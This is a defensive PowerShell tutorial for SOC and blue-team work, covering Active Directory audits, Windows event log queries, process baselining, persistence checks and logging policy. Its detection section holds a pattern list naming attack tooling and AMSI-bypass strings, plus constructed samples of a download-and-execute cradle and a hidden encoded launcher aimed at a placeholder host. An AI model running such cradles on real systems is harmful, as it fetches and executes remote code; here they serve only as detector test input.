PowerShell for Security: AD Management, Log Analysis, and Blue Team Scripts
Part of the Cybersecurity Skills Guide — This article is one deep-dive in our complete guide series.
By HADESS Team | February 28, 2026 | Updated: February 28, 2026 | 5 min read
PowerShell is the primary automation tool for Windows environments, and most enterprise networks run Windows. If you work in a SOC, manage Active Directory, or handle incident response on Windows systems, PowerShell proficiency is not optional. It is also the language attackers use — understanding PowerShell helps you recognize and detect malicious usage.
Active Directory Management
AD management tasks that take hours in the GUI take seconds in PowerShell.
Find inactive accounts that should be disabled:
```powershell
$threshold = (Get-Date).AddDays(-90)
Get-ADUser -Filter {LastLogonDate -lt $threshold -and Enabled -eq $true} -Properties LastLogonDate |
    Select-Object Name, SamAccountName, LastLogonDate |
    Sort-Object LastLogonDate
```

Two caveats before you disable anything from this list: LastLogonDate is derived from lastLogonTimestamp, which replicates with a lag of up to about 14 days, so a 90-day threshold is really "somewhere between 76 and 90 days"; and accounts that have never logged on have no LastLogonDate at all and do not match the -lt comparison, so query for an empty LastLogonDate separately.
Audit group membership for privileged groups:
```powershell
$groups = @("Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators")
foreach ($group in $groups) {
    Write-Output "=== $group ==="
    # -Recursive expands nested groups. Keep only user objects: a computer account or
    # foreign security principal in the result would make Get-ADUser fail.
    Get-ADGroupMember -Identity $group -Recursive |
        Where-Object objectClass -eq 'user' |
        Get-ADUser -Properties LastLogonDate, WhenCreated |
        Select-Object Name, SamAccountName, LastLogonDate, WhenCreated
}
```
Detect accounts with Kerberos pre-authentication disabled (AS-REP Roasting targets):
```powershell
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth |
    Select-Object Name, SamAccountName
```

Anyone on the network can request an AS-REP for these accounts without knowing the password and crack it offline. Unless an application genuinely needs the flag, clear it with Set-ADAccountControl -DoesNotRequirePreAuth $false and make sure the account has a long password in the meantime.
Log Analysis
Windows Event Logs contain rich security data. PowerShell extracts and filters it efficiently.
Find failed logon attempts (Event ID 4625):
```powershell
Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4625
    StartTime = (Get-Date).AddHours(-24)
} | ForEach-Object {
    # Look EventData fields up by name. The positional order of 4625 is stable
    # (TargetUserName is index 5, Status 7, IpAddress 19), but a named lookup is
    # easier to audit and reuses cleanly for other event IDs.
    $data = @{}
    foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) {
        $data[$d.GetAttribute('Name')] = $d.'#text'
    }
    [PSCustomObject]@{
        Time    = $_.TimeCreated
        Account = $data['TargetUserName']
        Source  = $data['IpAddress']   # '-' for local or non-network logons
        Status  = $data['Status']      # 0xC000006D = logon failure; SubStatus holds the reason
    }
} | Group-Object Source | Sort-Object Count -Descending
```

Run this on the host that received the attempts: 4625 is written locally on the workstation or server where the logon failed. For domain accounts the domain controllers record the failures as 4771 (Kerberos pre-authentication failed) or 4776 (NTLM validation), not 4625.
Detect PowerShell execution (Event ID 4104 — script block logging):
```powershell
# -MaxEvents 100 keeps only the newest 100 events; for a real hunt add
# StartTime to the hashtable instead of capping the count.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 100 | Where-Object {
    # -match is case-insensitive, so 'IEX' also catches 'iex'
    $_.Message -match 'Invoke-Mimikatz|Invoke-Expression|IEX|DownloadString'
} | Select-Object TimeCreated, Message
```

4104 is only fully populated once Script Block Logging is enabled (PowerShell 5 and later still writes blocks it considers suspicious at Warning level without it, which is worth a look on its own). PowerShell 7 logs its 4104 events to PowerShellCore/Operational, so query both logs on hosts that have it installed.
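The regex above only sees what is literally in the script block, and a launcher such as `powershell -enc <base64>` shows nothing useful until the payload is decoded. The following is an added example, not code from the original article: an offline detector that runs a pattern list over script-block text, decodes any long base64 runs it finds, and re-runs the patterns on the decoded layers. The pattern list and the three sample blocks are constructed for the example; on a live host you would feed it `$_.Message` from the 4104 query above. It assumes, as PowerShell does for -EncodedCommand, that an encoded payload is UTF-16LE and falls back to UTF-8 otherwise.

```powershell
# Added example (not from the original article). Patterns are illustrative, not a complete list.
$SuspiciousPatterns = @(
    'Invoke-Mimikatz',
    'Invoke-Expression|\bIEX\b',
    'DownloadString|DownloadFile',
    'FromBase64String',
    '-EncodedCommand|\s-e(c|nc?)?\s',
    'AmsiUtils|amsiInitFailed|AmsiScanBuffer'
)

function Get-DecodedBase64Layers {
    param([string]$Text)
    # Candidate runs must be a multiple of 4 chars to be valid base64; short runs are noise.
    foreach ($m in [regex]::Matches($Text, '[A-Za-z0-9+/]{32,}={0,2}')) {
        if ($m.Value.Length % 4 -ne 0) { continue }
        try { $bytes = [Convert]::FromBase64String($m.Value) } catch { continue }
        # -EncodedCommand payloads are UTF-16LE (assumption for anything else: UTF-8).
        $s = [Text.Encoding]::Unicode.GetString($bytes)
        if ($s -match '[^\x09\x0A\x0D\x20-\x7E]') { $s = [Text.Encoding]::UTF8.GetString($bytes) }
        $s
    }
}

function Test-ScriptBlockText {
    param([Parameter(Mandatory)][string]$Text)
    $hits   = @($SuspiciousPatterns | Where-Object { $Text -match $_ })
    $layers = @(Get-DecodedBase64Layers -Text $Text)
    foreach ($layer in $layers) {
        # Matches inside a decoded layer are tagged so the analyst sees which stage fired.
        $hits += @($SuspiciousPatterns | Where-Object { $layer -match $_ } | ForEach-Object { "decoded:$_" })
    }
    [PSCustomObject]@{
        Suspicious = $hits.Count -gt 0
        Matches    = $hits
        Decoded    = $layers
    }
}

# Constructed samples: a benign block, a plain-text download cradle, and an -EncodedCommand
# launcher whose payload only shows the cradle after decoding. example.invalid never resolves.
$cradle  = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$samples = @(
    'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB',
    $cradle,
    "powershell.exe -nop -w hidden -enc $encoded"
)
foreach ($s in $samples) {
    $r = Test-ScriptBlockText -Text $s
    '{0,-10} {1}' -f $(if ($r.Suspicious) { 'SUSPICIOUS' } else { 'clean' }), ($r.Matches -join ', ')
}
```

The first sample comes back clean, the second fires on the IEX and DownloadString patterns directly, and the third fires on the -enc switch at the top level and again on decoded:IEX and decoded:DownloadString once the payload is unpacked. Base64 that decodes to binary will still pass through as garbage text; that is harmless for matching but means you should not trust the Decoded field as readable without looking at it.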
Blue Team Scripts
Build detection and response scripts that your SOC can run during investigations.
Baseline running processes and detect anomalies:
```powershell
# Generate baseline. Path is normalised to a string so a process with no
# accessible path compares as "" both here and after a CSV round-trip.
Get-Process | Select-Object Name, @{n='Path'; e={[string]$_.Path}}, Id |
    Export-Csv -Path "C:\Security\process_baseline.csv" -NoTypeInformation

# Compare current to baseline; '=>' marks Name/Path pairs present now but not in the baseline
$baseline = Import-Csv "C:\Security\process_baseline.csv"
$current  = Get-Process | Select-Object Name, @{n='Path'; e={[string]$_.Path}}
$new = Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Name, Path |
    Where-Object { $_.SideIndicator -eq '=>' }
$new
```

Run both halves elevated, otherwise Path is empty for processes owned by other users and the comparison degrades to process names. The comparison is on name and path only: a binary replaced in place at a known-good path will not show up, so hash the paths you care about (Get-FileHash) as a second baseline.
Check for persistence mechanisms:
```powershell
# Scheduled tasks created recently. Date comes back as a string from the task XML,
# is often empty, and is written by whoever registers the task, so treat it as a lead.
Get-ScheduledTask | Where-Object {
    ($_.Date -as [datetime]) -gt (Get-Date).AddDays(-7)
} | Select-Object TaskName, TaskPath, Date, Author

# Run keys (RunOnce and the Wow6432Node equivalents are worth the same check)
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
```
PowerShell Security Controls
Understand the controls because attackers bypass them and defenders rely on them:
- Constrained Language Mode restricts the language rather than individual cmdlets: arbitrary .NET types, Add-Type, COM objects and most reflection are unavailable, which breaks the bulk of in-memory attack tooling. It only holds when a WDAC or AppLocker policy enforces it; a mode set from a profile or an environment variable is escaped by starting a new PowerShell process.
- Script Block Logging (Event ID 4104) records the text of every script block the engine compiles. An obfuscated script has to hand the engine its decoded code in order to run it, so each decoded layer is logged in readable form.
- AMSI (Antimalware Scan Interface) passes script content to the installed antimalware engine at execution time, including content built at run time and fed to Invoke-Expression.
- AppLocker/WDAC policies control which scripts and binaries can run, and are what puts PowerShell into Constrained Language Mode for scripts the policy does not approve.
Enable all of these. Script block logging is the one you will lean on during investigations: because it captures each layer as it is executed, encoding and obfuscation end up in the log in the clear. It is not a deobfuscator, though. A stage that never runs is never logged, and a long block is split across several 4104 events ("Creating Scriptblock text (1 of N)"), so correlate them by the ScriptBlock ID in the message. Expect real volume and forward the log to your SIEM.
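The logging controls are policy registry values under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell, which is also where Group Policy writes them. The script below is an added example, not code from the original article: it reports the current state of Script Block Logging, Module Logging, Transcription and the session's language mode, and an Enable-PowerShellLogging function sets the values locally. It assumes an elevated session on a machine where local policy is acceptable; in a domain, set the same values through a GPO so they are not overwritten at the next refresh. The transcript directory C:\PSTranscripts is an assumption; point it at a write-only share in production so an attacker on the host cannot read or remove the transcripts.

```powershell
# Added example (not from the original article): audit and enable PowerShell logging policy.
$PolicyBase = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PowerShellLoggingState {
    $read = {
        param($Sub, $Name)
        (Get-ItemProperty -Path "$PolicyBase\$Sub" -Name $Name -ErrorAction SilentlyContinue).$Name
    }
    [PSCustomObject]@{
        ScriptBlockLogging = (& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (& $read 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription      = (& $read 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDir      = & $read 'Transcription' 'OutputDirectory'
        # FullLanguage here means CLM is not enforced for this session
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
    }
}

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed location; see lead-in
    # Create the keys in parent-first order so each New-Item has an existing parent.
    foreach ($sub in 'ScriptBlockLogging', 'ModuleLogging', 'ModuleLogging\ModuleNames', 'Transcription') {
        New-Item -Path "$PolicyBase\$sub" -Force | Out-Null
    }
    Set-ItemProperty -Path "$PolicyBase\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyBase\ModuleLogging"      -Name EnableModuleLogging      -Value 1 -Type DWord
    # '*' = '*' under ModuleNames logs pipeline execution (4103) for every module
    Set-ItemProperty -Path "$PolicyBase\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String
    Set-ItemProperty -Path "$PolicyBase\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyBase\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$PolicyBase\Transcription" -Name OutputDirectory -Value $TranscriptDir -Type String
    New-Item -ItemType Directory -Path $TranscriptDir -Force | Out-Null
}

Get-PowerShellLoggingState
```

Run Get-PowerShellLoggingState first, keep the output as evidence of the starting state, then call Enable-PowerShellLogging and rerun the check from a fresh PowerShell process, since the policy is read when the engine starts. Module Logging (4103) and transcription are not in the list above but come from the same policy branch and add the per-command detail and the console output that 4104 alone does not give you.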
Related Career Paths
PowerShell skills map directly to SOC Analyst and Blue Team career paths. Windows endpoint investigation and Active Directory security monitoring depend on PowerShell fluency.
Next Steps
- Test your PowerShell skills with the skills assessment
- Browse the skills library for Windows security and incident response topics
- Use the coaching tool to build a practice plan around Windows security operations
Related Guides in This Series
- Bash Scripting for Security: Log Parsing, Automation, and Recon
- Problem Solving for Security: Root Cause Analysis and Debugging
- Python for Security: Tooling, Automation, and Exploit Development
Take the Next Step
Browse 80+ skills on HADESS.
See your certification roadmap.
Get started free — Create your HADESS account and access all career tools.
Frequently Asked Questions
How long does it take to learn this skill?
Most practitioners build working proficiency in 4-8 weeks of dedicated study with hands-on practice. Mastery takes longer and comes primarily through on-the-job experience.
Do I need certifications for this skill?
Certifications validate your knowledge to employers but are not strictly required. Hands-on experience and portfolio projects often carry more weight in technical interviews. Check the certification roadmap for relevant options.
What career paths use this skill?
Explore the career path explorer to see which roles require this skill and how it fits into different cybersecurity specializations.
—
HADESS Team consists of cybersecurity practitioners, hiring managers, and career strategists who have collectively spent 50+ years in the field.
